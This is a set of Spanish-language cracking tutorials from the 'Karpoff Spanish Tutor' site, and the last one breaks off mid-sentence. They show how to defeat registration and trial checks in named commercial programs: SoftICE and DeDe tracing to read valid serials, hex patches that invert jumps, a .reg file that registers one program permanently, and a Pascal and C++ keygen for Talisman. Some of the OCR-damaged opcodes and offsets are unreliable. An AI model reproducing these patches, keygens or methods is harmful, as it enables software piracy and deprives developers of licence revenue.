Abrimos el DeDe y elegimos el fichero FCP.EXE para su decompilado. Le damos a Process, y 
cuando el ordenata deje de pensar, entonces pasamos de las CLASESS INFO y nos vamos 
directamente a PROCEDURES. Nos aparece un montón de cosas, pero es que ha llegado el momento 
del ZENcracking. 

¿Qué es lo que estamos buscando?. El formulario que nos aparece cuando le damos a REGISTER 
en cualquier momento en el programa (da igual si lo hacemos en la NAG o en el menú, aparece 
siempre la misma ventana). Pues miramos por la lista de PROCEDURES, en la columna "Unit 
Name", buscando algo con referencia a Register, Reg, o cualquier cosa que se le parezca. 
Afortunadamente nos encontramos con una "Unit Name" con el nombre de RegisterFrm. Más 
explícito imposible. Pulsamos sobre él y sobre el comando "Events", en la parte de la 
derecha. Nos encontramos con 3 eventos. Pero el que nos interesa es el de 
"btnRegisterClick". Para aseguranos de que vamos por el buen camino, podemos opcionalmente 
pulsar con el botón derecho del ratón sobre eso mismo y en "Show Additional Data" en el menú 
mergente. Efectivamente, vamos por el buen camino, pues es un botón con la etiqueta 
"Register". Desensamblamos. Para ello, sobre el mismo menú emergente de antes, damos esta 
vez en "Disassemble". 

Y nos encontraremos con el código en ASM de todo el evento: 


004B7478 55 push ebp 

004B7479 8BEC mov ebp, esp 

004B747B B906000000 mov ecx, $00000006 
004B7480 6A00 push $00 


004B7536 8D4DEO lea ecx, [ebp-$20] 
004B7539 5A pop edx 


004B753A E82DD4FFFF call 004B496C <----- LLAMADA A GENERAR EL SERIAL VÁLIDO 
004B753F 8B45E0 mov eax, [ebp-$20] 
004B7542 50 push eax <----- EL TESORO DE DON TRUEKENEGUER 


004B7619 E93EC1F4FF jmp 0040375C 
004B761E EBBE jmp 004B75DE 


KKKXXKXKX END 


004B7620 8BE5 mov esp, ebp 
004B7622 5D pop ebp 
004B7623 C3 ret 


A por el SiCE, que nos espera ansiosamente. 


Traspaso de Poder al SICE: 


Ahora que ya sabemos dónde poner un BPX, lo único que tenemos que hacer es irnos al SiCE y 
hacer lo propio y rutinario de todo Cracker: Abre Symbol Loader---> Carga FCP.EXE ----> 
Pulsa en las ruedas dentadas----> Cuando salte pon un BPX en 4B7542. 

En el programa, ya sea en la NAG o en el menú, intenta registrar el programa, para ello, pon 
cualquier dato. 


NOMBRE: LEIRUS 
COMPAÑÍA: K-FoR 
SERIAL: FCP 147 258 369 


Damos a Register (se activa cuando está todo entrado) y... fascinantemente, el SiCE detecta 
la instrucción y nos dice con un letrero centelleante: MIRA EL CONTENIDO DE EAX, PARA ELLO, 
ESCRIBE D EAX. Lo hacemos, y en la ventana de datos aparece un maravilloso numerillo que 
tiene toda la pinta de un serial (de hecho lo es). 

Lo apuntamos y en la próxima ejecución del programa, lo escribiremos, y estará registrado el 
programa a tu nombre. NADA MÁS POR HOY. 


Despedida 


Ante todo, gracias a Karpoff por el apoyo recibido y por haber hecho una gran página, que 
crece día a día y que presenta a los Newbies como yo un portal donde poder enterarnos de las 
últimas novedades y adquirir información, así como aprender de forma desmesurada. 

Gracias a ProfesorX, por el gran trabajo que está haciendo recopilando tutoriales con el 
Tutorial Crack 2000. Una maravilla, sinceramente. 

Y por supuesto, gracias a los otros componentes del grupo K-FoR, ViPER y RAZiEL, que sin su 
incondicional apoyo, gratitud y predisposición a ayudarme no hubiera conseguido hacer lo que 
he hecho. Por ellos y por el grupo va dedicado este TUT. Gracias a todos. 


"CRACKEO, LUEGO SOY LIBRE" 


sobre 


Pagina dedicada a la divulgacion de informacion en Castellano, 
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Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: 


Códigos Postales v 4.11 


PROTECCION: Limitacion de Tiempo. 


Descripcion: 


Dificultad: Principiante 


http://members.nbci.com/codpostal/ (Cd-Actual 48) 


Guía de códigos postales de España 


DOWNLOAD : 


Herramientas: DeDe v2.x, Editor Hexa, KrackPE y Softice 


CRACKER: KuaTo_ThoR FECHA: 16/09/2000 


| INTRODUCCION 


Bueno, aquí estoy otra vez. En esta ocasión voy a emplear algunas herramientas poco utilizadas, y que 
realmente son muy útiles, como es el desensamblador para Delphi DeDe de DaFixer y el KrackPE de n u M 
IT T_or. 


Finalmente he decidido añadir cómo encontrar el número de serie correcto, para eso utilizaremos el Softice. 


AL ATAKE 


Preliminares. Obtener información. 


Lo primero como siempre es enterarnos de qué va el tema. Iniciamos el programa, esperamos a que se carguen unas 
cuantas cosillas... y ya está, arranca el programa. En la ventana principal, podemos ver unos botones a la izquierda, el 
último, con una llave, es el de registro, y un par de ellos más arriba con un dibujo del Word, es el manual de uso. Si 
probamos a registrar, podemos ver cómo únicamente se nos pide el código, lo cual parece indicar que va a ser un 
código único para todo el mundo. Si miramos en el manual podremos encontrar al final la parte referente a las 
restricciones de uso, que en este caso es que 30 dias después de la instalación nuestro programa dejará de funcionar. Lo 
curioso es que no he visto cuánto vale el programa. 


Ahora hay que ver en que lenguaje está escrito y si está comprimido. Para ello yo he utilizado el GetTyp, nos dice que 
está escrito en Delphi y que no está comprimido. Perfecto. 


Al AtaKe 


Bien, iniciamos el DeDe. En la ventana principal aparece la típica carpetita abierta de windows, pinchamos y 
seleccionamos el archivo 'víctima', en este caso codpostal.exe. Pulsamos sobre Process, esperamos unos segundos y 
ya está. Ahora debemos ir a Procedures, que creo que todos imaginamos lo que será. Nos aparece lo siguiente: 


| ¡DeDe v2.40 BETA 2A (c) 1999-2000 by DaFixer 


CAárchivos de programa'Códigos Postalest |> g | 


DBLoaDlg TLoginDialog 

DBPw*Dlg TPasswordDialog 

Unitl TForml 
TFormSplash 


A BitBtrl Click DDASDAEC 


Normalmente los programadores pondrán un nombre sugerente a las Unidades o a algún Evento, con la palabra 
Register por algún lado, pero en este caso no, así que habrá que echárle un poco de imaginación. 


Si pulsamos sobre Unitl, en la ventana de la derecha, nos aparecerán un buen montón de Eventos, así que pasaremos 
de ella por el momento, las comprobaciones de registro suelen estar en únidades con pocos eventos. Si pulsamos sobre 
Unit13 y Unit3, no aparece ningún evento, así que vamos a Unit2. Nos aparece como vemos en la imagen un único 
evento, ahora pulsamos con el botón secundario del ratón sobre él, y en el menú sobre Show Additional Data, nos 
aparece lo siguiente (haciendo esto mismo podríamos haber comprobado que las dos primeras unidades manejan la 
base de datos): 


Como podemos ver vamos por buen camino, cuando pulsemos el botón registrar, después de haber introducido el 
serial, el programa viene justo aquí, no tenemos que buscar más estamos en la zona caliente. ¿Cómo ver el código? 
Fácil, sólo hay que pulsar dos veces sobre el evento deseado y ya está. Siguiendo el código podemos ver algo 
realmente interesante: 


0049DB46 8D45E8 lea eax, l[ebp-$18] 

0049DB49 EBAECSDF6FF call 0040A0FC <-— Pillamos el código gieno 

0049DB4E 8B55E8 mov edx, [ebp-$18] <- ¿el código gueno? 

0049DB51 58 pop eax 

0049DB52 E8F164F6FF call 00404048 <- Comparamos los códigos. 

0049DB57 750€ jnz 0049DB65 <-— Saltar o no saltar esa es la cuestión. 

0049DB59 C7833402000001000000 mov dword ptr [ebx+$0234], $00000001 <- ¿Gúeno? 
0049DB63 EBOA jmp 0049DB6F 

0049DB65 C7833402000003000000 mov dword ptr [ebx+$0234], $00000003 <- ¿Malo? 
0049DB6F 33C0 xor eax, eax 


Si pulsamos sobre un call, también nos aparecerá su contenido. 


Todo esto con el softice estaría claro, cómo podremos ver más adelante. Lo que está claro ahora es que si invertimos el 
salto 0049DB57 iremos a chico giteno, podemos probarlo con un editor hexa, pero ¿cómo conseguimos el Offset? No 
se cómo hacerlo con el DeDe, así que voy a utilizar otra magnífica herramienta, ésta de nu M I T_or, el KrackPE, que 
sirve para cosas mucho más interesantes que ésta, como veremos más abajo. Ejecutamos el KrackPE, seleccionamos 
nuestro archivo 'víctima', donde pone Virtual Address: introducimos 49DB57, pulsamos a Get Offset y ya está. El 
aspecto es el siguiente: 


* KrackPE v0.5 - by nuMlT_or 


490857. 


Donde están las XXXXXX, estaría el offset, pero os dejo que curréis un poco. 


Si habéis hecho todo, y probáis a introducir un código cualquiera veréis que lo acepta, y además podéis comprobar que 
es permanente, incluso si intentamos meter nuevamente el código nos dice que ya nos registramos anteriormente. 
Interesante, esto quiere decir que al registrarse crea en el registro (o en un archivo) una clave, que al leerla le dice que 
está registrado. Si cuando os registráis tenéis activado algún programa 'espía' que controle las entradas en el registro, o 
los cambios en éste, podemos comprobar que lo que cambia es lo siguiente, pone: 


[HKEY_LOCAL_MACHINE SoftwareTena Códigos Postales] 
"Version"=hex:00,00,00,00,00,00,10,40 
"Producto"=hex:00,00,00,00,00,00,10,40 


donde antes ponía lo que podía ser la fecha de fin de evaluación. Si las borramos volveremos a estar sin registrar, y si 
deshacemos los cambios realizados en el editor hexa, y metemos estos datos en el registro, estaremos registrados sin 
introducir ningún código. Grave error, podremos crear un "parche" con un simple archivo .reg como el siguiente: 


REGEDIT4 


[HKEY_LOCAL_MACHINE SoftwareTena Códigos Postales] 
"Version"=hex:00,00,00,00,00,00,10,40 
"Producto"=hex:00,00,00,00,00,00,10,40 


Guardado el archivo como xxxxx.reg, sólo tenemos que 'ejecutarlo' y estaremos registrados de por vida. 
Obtener el Código Válido 


Lo primero es entrar con el Softice en el programa. Damos a registrar, escribimos un código cualquiera, por 
ejemplo1472583690, vamos a Softice (Ctrl+D), y ponemos un bpx hmemcpy. Volvemos al programa (FS), damos a 
registrar y salta el Softice. Borramos el break, bcO y vamos con F12 hasta que en la línea verde aparezca 
Codpostal!Code, entonces estaremos en nuestro programa. Ahora, vamos con F10, pasando por unos cuantos RET 
hasta que llegamos a 49DB38 (cómo sabíamos esta dirección podríamos haber puesto un bpx directamente aquí), si 
escribimos ?eax, nos aparecerá nuestro código. Si seguimos un poco más con F10, llegamos a lo de antes, vuelvo a 
ponerlo: 


0049DB46 8D45E8 lea eax, [ebp-$18] 

0049DB49 ESAECSF6FF call 0040AOFC <- Pillamos el código giieno 

0049DB4E 8B55E8 mov edx, [ebp-$18] <- El código gijeno 

0049DB51 58 pop eax <- El código malo 

0049DB52 ESF164F6FF call 00404048 <- Comparamos los códigos. 

0049DB57 750C jnz 0049DB65 <- Saltamos si nuestro código es Malo. 

0049DB59 C7833402000001000000 mov dword ptr [ebx+$0234], $00000001 <- Giieno 
0049DB63 EBOA ¡mp 0049DB6F 

0049DB65 C7833402000003000000 mov dword ptr [ebx+$0234], $00000003 <- Malo 
0049DB6F 33CO0 xor eax, eax 


Bueno, han desaparecido las dudas ; ) 
Para ver el código válido, sólo hay que poner ?edx, en 49DB51. 
Algo más con KrackPE 


Como os habréis podido imaginar esta herramienta sirve para bastante más que para obtener un Offset. Si os fijáis en la 
imagen que he puesto arriba, a la derecha, pone Get Greatest Space, ¿qué es esto? Pués localiza en el código del 
programa el mayor espacio vacío, de tal forma que podemos meter nuestras propias instruccciones ahí, únicamente 
tenemos que direccionar el programa hacia ahí. Por ejemplo: 


En este programa, en el Call que compara los códigos, únicamente nos interesa, si edx sale con valor cero o no. Si vale 
cero, vamos a código correcto, cosa que podemos conseguir con una instrucción como xor edx,edx obteniendo el 
mismo resultado. Por tanto si en lugar de hacer Call 00404048, llamamos a ese espacio vacío, en el que ponemos 
nuestro xor edx,edx y por supuesto un ret para salir de la llamada, tendremos que siempre acepta nuestro código, sea 
válido o no. Ya sé que en este programa todo este trabajo es una chorrada, pero en otros será muy útil. 


Si pulsamos sobre Get Greatest Space, obtenemos que nuestro espacio está localizado en 4AD014, con offset ASE14, 
el tamaño no nos interesa, ya que lo que vamos a meter no ocupa nada. Ya sabemos donde tiene que apuntar nuestro 
call y lo que queremos meter. Sólo queda saber cómo coño escribimos esto en nuestro editor hexa. Bueno, voy a poner 


cómo se escribe y luego una manera de obtenerlo: 


Call 4AD014 ---> ESBDF40000 
xor edx, edx ----> 31D2 


Los dos últimos siempre se escriben así, pero el primero es un poco más jodido. Cómo sacarlo, una forma sencilla es 
con el Wdasm, desensamblamos el ejecutable original, vamos al menú Debug y seleccionamos Load Process, damos a 
Load, ya sólo queda ir a la dirección donde queremos cambiar algo, en el caso del call a 49DB52, pulsamos a Patch 
Code, metemos la nueva instrucción, en este caso Call 4AD014, damos a enter, y nos aparece cómo escribirlo. Hay 
otras maneras de obtenerlo, pero creo que ésta es bastante sencilla. 


Obtenemos el offset del Call, que es 9CF32 y ya sólo tenemos que realizar los cambios con nuestro editor hexa. Vamos 
a 9CF52, y metemos ESBDF40000, siempre con cuidado de que nuestra nueva instrucción no ocupe más que la 
instrucción original, si ocupase menos podemos meter unos nops (90). Ahora vamos a A8E14, y metemos 31D2C3, 
guardamos los cambios, probamos a introducir un código cualquiera en el programa, y mensaje de registrado, todo 
perfecto. 


No siempre será tan sencillo, en muchas ocasiones habrá que reajustar otros registros, como el de la pila. Para saber 
que registros se modifican dentro de un call, lo podemos ver con el softice de manera sencilla. Lo primero es poder ver 


todos los registros en el softice, si no los tenéis en la parte superior de la pantalla, pulsad F2 y aparecerán. Los registros 
que se ven en azul, son los que cambian al ejecutarse cada instrucción. 


Nada más por esta vez, espero que os haya resultado útil. No olvidéis que nuestro objetivo sólo es aprender. (sin 
contar con la diversión por supuesto ;-)) 


Hasta la próxima... 


«rre oa y» 


P.D.: Si hay algo que no he dejado sufientemente claro o lo que sea, ya sabéis: kuato_thor hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Talisman 1.7.0.4 


PROTECCION: Trial de 30 días, con código de registro. 
Descripcion: Escritorio Alternativo. 
Dificultad: Newbie 


DOWNLOAD : http://www.lighttek.com 
Herramientas: Softice, Regmon, Api Spy 2.4, Editor Hexa. 
CRACKER: KuaTo_ThoR FECHA: 28/01/2001 


INTRODUCCION 


Muy Buenas, nuevamente estoy aquí, esta vez la víctima, a penas opondrá resistencia. ;-) 


Al menos podremos utilizar una herramienta poco usual, Api Spy, veremos que es muy útil para situarnos en el 
lugar adecuado. 


El cálculo del código válido, es bastante vergonzoso, no se han roto la cabeza al programarlo. 


AL ATAKE 


Preliminares. Obtener Información 


Lo primero como siempre es saber de que va el tema. Ejecutamos el programa, y desaparece nuestro escritorio convencional win 
por otro más bonito, pero en inglés, mmm.... Seleccionamos la opción de ver la barra de herramientas normal, y junto al reloj, 
está el icono del programa, botón secundatio y pulsamos Quit. Nos aparece una ventana de registro, donde ya nos rellenan el 
nombre y el código con "User name" y "User Code", pulsamos Aceptar, y nos salta una ventana diciendo que el serial no es un 
entero válido, mmm..., error n21. Cambiamos el código por cualquier número, metemos uno de unos 12 dígitos (todo unos p.ej.), 
y nos dice que 'invalid integer value', ponemos uno de once, 'invalid...', uno de diez, y nos dice que el código no es el correcto. 
Por tanto ya sabemos que el tamaño del código correcto no será mayor de diez. 


Si no tenéis cargado Sice, ya podéis ir cargándolo... 


BUSCANDO ALGO 


Bien, nos situamos nuevamente en la ventana de registro (mejor acceder a ella por el menú 'Help'). Metemos un código menor de 
diez cifras, y antes de pulsar, vamos a Sice (F5). Ponemos los típicos breaks, bpx getwindowtexta, bpx getdlgitemtexta, bpx 
getdlgitemint, volvemos al programa damos a aceptar y nada de nada, no salta Sice. Por tanto, para no volvernos locos, usamos 
el comodín de Hmemcpy. Ponemos el breakpoint (bpx hmemcpy), nuevamente pulsamos Aceptar, y esta vez sí salta Sice. 
Pulsamos F12 hasta aparecer en el código de Talisman. Lo malo del hmemcpy, es que no aparecemos muy bien situados, así que 
trazamos con F10, pasando Ret tras Ret. Seguimos trazando mirando si esta nuestro código por algún sitio, hasta que llegamos 
aquí: 


:00484B74 8975EC mov dword ptr [ebp-14], esi 

:00484B77 DB45EC fild dword ptr [ebp-14] 

:00484B7A ESFDDDF7FF call 0040297C 

:00484B7F 69C009030000 imul eax, 00000309 <- Caliente, caliente. 
:00484B85 8BFO mov esi, eax 

:00484B87 3B75FC cmp esi, dword ptr [ebp-04] <- ¿Una comparación? 
:00484B8A 0F84BF000000 je 00484C4F <- ¿Un Salto lejos de aquí? 
:00484B90 B201 mov dl, 01 

:00484B92 A120614500 mov eax, dword ptr [00456120] 

:00484B97 E88016FDFF call 0045621C 

:00484B9C 8BFO mov esi, eax 

:00484B9E B101 mov cl, 01 


Justo antes de este trozo de código hay un bucle, donde se calcula un número con el nombre. Después del Call que vemos en 
comparación, y dependiendo de el resultado de ésta, nos quedamos por aquí, o nos manda muy lejos, mmm... ¡¡¡¡ QUE 
DISIMULO !!!! Vamos a probar que pasa si invertmos el salto. Una vez sobre 00484B8A, metemos en Sice R FL Z, que cambia la 


flag cero, es decir, que 'invierte el salto'. Damos F5 y registrados. Pulsamos OK, y volvemos a ver si estamos registrados, ... Sí, lo 
estamos. Reiniciamos el programa, volvemos a mirar, ... No, ya no lo estamos. 


¿Qué quiere decir esto? simplemente, que vuelve a comprobar si el código es correcto. Sólo hay que localizar la rutina donde lo 
comprueba y se terminó. 


EN BUSCA DE LA COMPROBACIÓN INICIAL 


Para poder hacer la comprobación, necesita guardar la información de registro en algún sitio, usualmente en el registro de 
windows, otras en un archivo. 


Bueno, para esto vamos a utilizar Regmon y Api Spy. Estas herramientas son básicas, así que las podréis encontrar en cualquier 
web de cracking. 


Abrimos Regmon, y ponemos algo como esto: 


Regmon Filtro 


Ahora iniciamos Talisman, vemos como el Regmon se va llenado de información. Vamos a la ventana de registro, y metemos los 
datos, nuevamente invertimos el salto en el Sice, y vemos que en el Regmon, han aparecido cosas nuevas, ya podemos pulsar el 
botón de la lupa para pararlo, y podemos ver cosas tan interesantes como que hay unas claves en el registro llamadas 'usercode' 
y 'username.. 


Es la hora de utilizar Api Spy. No me voy a extender mucho en su modo de uso, porque es muy sencillo de utilizar. Lo que hace 
este programa es localizar las llamadas que realiza nuestro programa víctima a las distintas funciones que hay dentro de cada 
librería. En este caso lo que nos interesan son las llamadas al registro, es decir RegQueryValueExa, RegCreateKeyExa y compañía. 
Todas estas funciones estás el la librería ADVAPI32, por tanto pulsamos el botón Add y seleccionamos ADVAPI 32.fnl. Podéis ver 
que no lee directamente del archivo dll, pero con el programa viene una utilidad que transforma las dll a fnl, que no viene al caso, 
pero puede resultar útil saberlo para otra ocasión. En resumen, el programa tiene que quedar tal que así: 


sg APIS32 v. 2.4 - Registered to abcde 


A 


E occiso [ LPSTR, HANDLE, LPDATA ] 

: RegConnectRegistryw' [ LPWSTA, HANDLE, LPDATA ] 

: RegCreateKeyá [ HANDLE, LPSTR, LPDATA ] 

: RegCreateKeyExá [ HANDLE, LPSTR. DWORD, LPSTR, DWORD, DWORD, 
: RegCreateKeyw' [ HANDLE, LPW'STR, LPDATA ] 

: RegDeleteKeyó [ HANDLE, LPSTR ] 

: RegDeleteKeyW' [ HANDLE, LPWSTA ] 

: RegDeletealueá [ HANDLE, LPSTR ] 

: RegDeleteWaluew' [ HANDLE, LPWSTR ] 

: RegEnumKeyá [ HANDLE, DWORD, LPSTA, DWORD ] 

: RegEnumKeyExá [ HANDLE, DWORD, LPSTR, LPDATA, LPDATA, LPSTR, 

: RegEnumKeyw' [ HANDLE, DWORD, LPWSTRA, DWORD ] 

: RegEnumvalueá, [ HANDLE, DWORD, LPSTR, LPDATA, LPDATA, LPDATA, Ll 
; lod [ a Dl 


Pulsamos Run y se ejecutará nuestro programa a la vez que aparece una nueva ventana de Api Spy, volvemos a cerrar el 
programa y Api Spy nos dice que ha terminado, pulsamos el botón 'Save LOG, y se creará en el direccorio de Talisman, un 


archivo .log que podemos abrir con el worpad, por ejemplo. Una vez aquí buscamos 'usercode' y nos aparece por primera vez 
aquí: 


004566AA: RegQueryValueExA (HANDLE: CS8OBBADO,LPSTR:004905A4: "path", LPDATA:00000000,LPDATA: 0075FBOO,LPDATA: 
00000000,LPDATA:0075FB1C) 


004566AF: RegQueryValueExA = 2 

004566AA: RegQueryValueExA( HANDLE: C89BBADO, LPSTR:004905Dg8: "usercode",LPDATA:00000000,LPDATA: 0075FBOO, LPDATA 
:00000000,LPDATA:0075FB1C) 

004566AF: RegQueryValueExA = O 

004569A0: RegQueryValueExA(HANDLE: C89BBADO, LPSTR:004905D8: "usercode",LPDATA: 00000000, LPDATA:O0075FAEC,LPDATA 
:0075FB04, LPDATA:0075FB00) 

004569A5:RegQueryValueExA = 0 


004566AA: RegQueryValueExA([ HANDLE: CSOBBADO,LPSTR:004905EC: "username", LPDATA:00000000,LPDATA:0075FAEO,LPDATA 
:00000000,LPDATA:0075FAFC) 


Lo que nos interesa es la dirección de memoria que nos da, que es: 00456644. Pero podemos ver que justo encima aparece la 
misma dirección, pero para "path". Para saber cual es la nuestra, nos situamos al principio del documento, y esta vez buscamos la 
dirección, es decir, 004566AA. Podemos comprobar que es la cuarta llamada. 


Después de este coñazo, vamos al Symbol Loader, cargamos Talisman, ponemos el bpx 4566aa y nos saltamos las tres primeras 
rupturas de Sice. Pasamos del Ret para ver de donde nos llamaron y vemos esto: 


:00490239 E88A67FCFF call 004569C8 
:0049023E 84CO0 test al, al 

:00490240 0F8484000000 je 004902CA 
:00490246 BAD8054900 mov edx, 004905D8 
:0049024B 8BC3 mov eax, ebx 


Continuamos buscando algo interesante con F10, hasta que llegamos a esto otro: 


:0049028A 89B594FEFFFF mov dword ptr [ebp+FFFFFE94], esi 
:00490290 DB8594FEFFFF fild dword ptr [ebp+FFFFFE94] 

:00490296 E8E126F7FF call 0040297C -> Sacamos un número 
:0049029B 69C009030000 imul eax, 00000309 -> Una multiplicación 
:004902A1 8BFO mov esi, eax 

:004902A3 3B75FC cmp esi, dword ptr [ebp-04] -> Una comparación 
:004902A46 7514 ¡ne 004902BC -> Un salto 

:004902A8 B8A82C4A00 mov eax, 004A2CA8 


¿Qué es esto? ¡¡¡ es un calco de la comprobación anterior !!! Así que invertimos nuevamente el salto (00490246), y registrados 
para siempre. Para hacerlo permanente, utilizamos el editor hexadecimal, sólo tenemos que encontrar el offset, ya sea con el 
kracPE, el FileinsPEctor o cualquier otro. 


GENERADOR DE CLAVES 


Finalmente he decidido hacer un Keygen, puesto que es muy fácil y llevará poco tiempo. Vamos a por él. 
Cómo pudimos ver antes: 


:00484B32 E8892DF8FF call 004078C0 <- Eax= código falso 

:00484B37 8945EC mov dword ptr [ebp-14], eax 

:00484B3A DB45EC fild dword ptr [ebp-14] 

:00484B3D E83ADEF7FF call 0040297C 

:00484B42 8945FC mov dword ptr [ebp-04], eax 

:00484B45 8D55F8 lea edx, dword ptr [ebp-08] 

:00484B48 8B83FC010000 mov eax, dword ptr [ebx+000001FC] 

:00484B4E E8E1C8FO9FF call 00421434 

:00484B53 33F6 xor esi, esi 

:00484B55 8B45F8 mov eax, dword ptr [ebp-08] 

:00484B58 ESDFFOF7FF call 00403C3C <- eax=longitud del nombre 

:00484B5D 85C0 test eax, eax 

:00484B5F 7E13 jle 00484B74 

:00484B61 BA01000000 mov edx, 00000001 <- edx=1 

:00484B66 8B4DF8 mov ecx, dword ptr [ebp-08] <- Comienza el Bucle 

:00484B69 OFB64C11FF movzx ecx, byte ptr [ecx+edx-01] <- ecx= valor ASCII de la letra correspondiente a la posición edx de 
nuestro nombre en hexadecimal por supuesto 

:00484B6E O3F1 add esi, ecx <- esi= esi+ecx (la primera vuelta esi=0+ecx) 

:00484B70 42 inc edx <- edx=edx+1 

:00484B71 48 dec eax <- eax=eax-1 

:00484B72 75F2 ¡ne 00484B66 <- Volvemos al principio del bucle que calcula el "Número Mágico"(NM) a partir e nuestro nombre 
:00484B74 8975EC mov dword ptr [ebp-14], esi 

:00484B77 DB45EC fild dword ptr [ebp-14] 

:00484B7A ESFDDDF7FF call 0040297C <- eax=esi=NM 

:00484B7F 69C009030000 imul eax, 00000309 <- eax=eax* 309 

:00484B85 8BFO mov esi, eax <- esi=eax= Código Correcto (en hexa). 

:00484B87 3B75FC cmp esi, dword ptr [ebp-04] <- Compara el código falso con el correcto. 
:00484B8A OF84BF000000 je 00484C4F 


FIN. Así de fácil, suma los caracteres de nuestro nombre y los multiplica por 309h, es decr, por 777 decimal. Bonito número. 
Un ejemplo: Nombre=Pedro; 

NM= P+e+d-+r+o0 = 50+65+64+72+6F (en hexa) = 1FA = 80+101+100+114+111 (en decimal) = 506 

Código = 1FA*309 = 506*777 = 393162. Se acabó. 

Este es el Keygen más sencillo que tendremos la oportunidad de hacer, jejeje. 


En Pascal: 


Program KeyTalisman; 
uses crt; 


var 
nombre : string[30]; 
codigo: longint; 


¿Función de calculo del numero "magico" del nombre) 


function magico(nomb: string): integer; 
var 

long,numagic: integer; 

ecx: char; 

ascii: byte; 

begin 

long: =length(nomb); (eax) 
numagic: =0; fesi) 

repeat 

ecx: =nombI long]; 

ascii: =ord(ecx); 

long: =long-1; 

numagic: =ascii+-numagic; 
until long=0; 

magico: =numagic; 

end; 


begin (PPF 

clrscr; 

writeln; writeln; 
textbackground(white); 
textcolor(blue); 

Write(' ':10,'Generador de claves para Talisman v1.7 por '); 
textcolor( lightblue+blink); 
writeln(* 5, 'KuaTo_ThoR',' ':5); 
textcolor(black); 
textcolor(lightgray); 
textbackground(black); 

writeln; 

Write("'Tu nombre (max. 30 caracteres): '); 
readln(nombre); 

codigo: =magico(nombre); 

codigo: =codigo* 777; 

writeln; writeln; 

write("Tu PassWord es: ', codigo); 
writeln; writeln; 

writeln('Pulsa Enter para Salir"); 
readIn; 

end.(PPF 


Y en C++: (este sin florituras ;) 


FHinclude <iostream.h> 
Htinclude <string.h> 


void main() 
1 
char Nombre[ 32]; 

cout << "Tu Nombre: "; 

cin.getline (Nombre, 32); //Leemos el nombre 
int lon = strlen(Nombre); //Longitud del nombre 


int suma = 0; 
for (int i = 0; ¡ <=1lon; ¡++) 
1 


suma = suma + Nombre[i]; //Sumamos los caracteres del Nombre 


) 


unsigned long codigo = suma*777; // Calculamos el código 
cout << "Tu codigo es: " << codigo << An' << An'; 
cout << "Pulsa Enter para Salir"; 


cin.get(); 
J 


FINALIZANDO 


Nos lo han puesto muy fácil, a pesar de que hace dos comprobaciones, son las dos exactamente iguales, podría haberlo 
disimulado un poco mejor creo yo. 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. Espero que os haya resultado útil este tute. No olvidéis que nuestro objetivo sólo es 


aprender. Sin contar con la diversión que esto supone por supuesto ;-)) 


Un Gran Saludo para todos los miembros de [K-FoR], para los amigos de Tutoriales 2000. Y para el resto de vosotros, en especial 
para mi buen amigo BOnks. 


Hasta la próxima... 


Mi correo: kuato thortodhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 


'" En un lugar de La Mancha, de cuyo nombre no quiero acordarme, no ha mucho tiempo que vivía un hidalgo 
caballero de los de lanza en astillero, adarga antigua, rocín flaco y galgo corredor. Una olla de algo más vaca que 
carnero, ... " 


El Ingenioso Hidalgo Don Quijote de la Mancha 


Miguel de Cervantes Saavedra 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Drive Doppler 1.20 Release Candidate +2! 


PROTECCION: Name / Serial, Limitacion de Tiempo. 


Descripcion: Comprueba que carpetas incrementan de tamaño 


A 


http://www.pinoyware.com/download/dop12r2e.zip O 
ftp://ftp.gabtoof.com/shuffleplay/dop12r2e.zip 


DOWNLOAD : 


Herramientas: 


CRACKER: Karpoff FECHA: 19/11/1999 


| INTRODUCCION 


Hola gentes!! Bueno vamos a por el proyecto N*15 de los manuales para NewBies desde 
Cero, en este proyecto intentare explicar diferentes formas de crackear un mismo 
programa con diferentes herramientas, vamos a incorporar el SmartCheck este es un 
debugger para Visual Basic creado por Numega, es muy importante tener bien 
configurada esta herramienta para que nos muestre lo que queremos ver. 


SmartCheck 6.03, W32Dasm_VB, Editor Hexadecimal 


A pesar de lo que podáis pensar esta herramienta es muy fácil de usar si el objetivo 
es sacar un Serial Number correcto, por supuesto que el tema se complica si se 
quieren seguir algún proceso especifico etc. 


Para configurar el smartcheck adjunto unos gif sacados de un manual que no encuentro 
en este momento, pero con los gif no teneis ningun problema. AQUÍ 


Limitaciones del programa 


Tenemos 21 dias de evaluacion en esos 21 dias podemos evaluar el programa sin 
restricciones y sin Nag, tenemos la posibilidad de registrarnos mediante el tipico 
NAME: COMPANI: REGKEY: 


Atakes 
Con el SmartCheck localizaremos un Serial Number valido en cuestion de segundos, 


Con el W32dasmVB haremos que pasada la evaluacion el programa siga funcionando, 
localizando la rutina de fin de evaluacion y modificandola en beneficio nuestro J 


| A 
[| ALATAKE 


PARTE 1 SMARTCHECK 6.03 


Empezamos... abrimos el SmartCheck Lo configurado como muestran los gif. Con la Opcion open seleccionamos el 
ejecutable dlopper.exe 


NuMega SmartCheck - [DOPPLER exe - Program Results] 
View Program Window Help 


E 


Es importante que tengais la barra de herramientas con los botones pulsados que se ven en la 
imagen, una vez cargado doppler.exe pulsamos la casilla start, inmediatamente se empieza a 
ejecutar nuestra victima pero ni se imagina que le estamos viendo las tripas. Si habeis 
configurado el SmartCheck como os sugeri, mientras se ejecuta el programa aparecera una 
ventana de error que dice asi Numega SmartChec Error Detectted pulsais la opcion Acknowledge 
tantas veces como os aparezca. 


Bueno el programa esta iniciado solo tenemos que meter los datos de registro en HelplEnter 
Key 


Meteis los datos que os de la gana yo puse. 


NAME: karpoff 


COMP: kk 
S/N : 8493 
Pulsamos OK y nos escupe el mensage Invalid Code!! Aceptamos y vamos al SmartCheck y 


pulsamos la casilla End, por que aunque el programa ha terminado de ejecutarse sigue creando 
eventos y no es lo mismo buscar un S/N en 200 lineas de codigo que en 20000 J. 


Bueno para localizar el S/N correcto yo hago lo siguiente, bien lo localizo mediante la 
